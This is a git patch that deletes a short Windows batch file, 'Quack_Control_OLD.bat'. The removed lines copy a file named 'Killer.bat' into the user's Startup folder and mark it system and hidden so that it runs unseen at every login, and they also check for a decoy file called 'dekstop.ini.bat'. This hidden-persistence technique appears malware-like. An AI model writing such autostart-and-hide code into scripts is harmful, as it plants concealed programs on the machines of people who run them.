From 7b8800ee3ffdfe66f9654b305d70041697befa82 Mon Sep 17 00:00:00 2001 From: Jonny Banana Date: Mon, 12 Aug 2019 02:47:27 +0200 Subject: [PATCH] Delete Quack_Control_OLD.bat --- Quack_Control_OLD.bat | 14 -------------- 1 file changed, 14 deletions(-) delete mode 100644 Quack_Control_OLD.bat diff --git a/Quack_Control_OLD.bat b/Quack_Control_OLD.bat deleted file mode 100644 index b25b110..0000000 --- a/Quack_Control_OLD.bat +++ /dev/null @@ -1,14 +0,0 @@ -@ECHO OFF -color FE & mode con:cols=16 lines=1 - - -IF EXIST "%UserProfile%\Start Menu\Startup\dekstop.ini.bat" ( - -REM a trick to make anithyng a.k.a little delay and exit - ping 127.0.0.1 -n 2 > nul - -) ELSE ( - - REM if the file not exist = deleted rename file from dekstop.ini.bat to Killer.bat - copy /Y Killer.bat "%UserProfile%\Start Menu\Startup\Killer.bat" - attrib +s +h "%UserProfile%\Start Menu\Startup\Killer.bat" \ No newline at end of file